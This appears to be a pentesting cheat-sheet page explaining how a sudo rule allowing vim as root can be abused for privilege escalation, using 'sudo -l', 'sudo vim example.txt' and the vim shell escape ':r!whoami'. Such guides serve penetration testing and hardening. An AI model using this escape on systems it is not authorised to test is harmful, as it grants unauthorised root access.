search
Page cover

Sudo Vim Privilege Escalation

Sudo vim command might be vulnerable to privilege escalation (PrivEsc).

hashtag
Investigationarrow-up-right

sudo -l

(ALL) NOPASSWD: vim example.txt
Copied!

If we can execute "vim" command as root, we can execute the shell command in the vim editor.

hashtag
Exploitationarrow-up-right

Simply run "vim" command as root.

sudo vim example.txt
Copied!

In Vim editor, we can run shell commands as root.

:r!whoami
PreviousSudo Umount Privilege EscalationNextSudo Wall Privilege Escalation

Last updated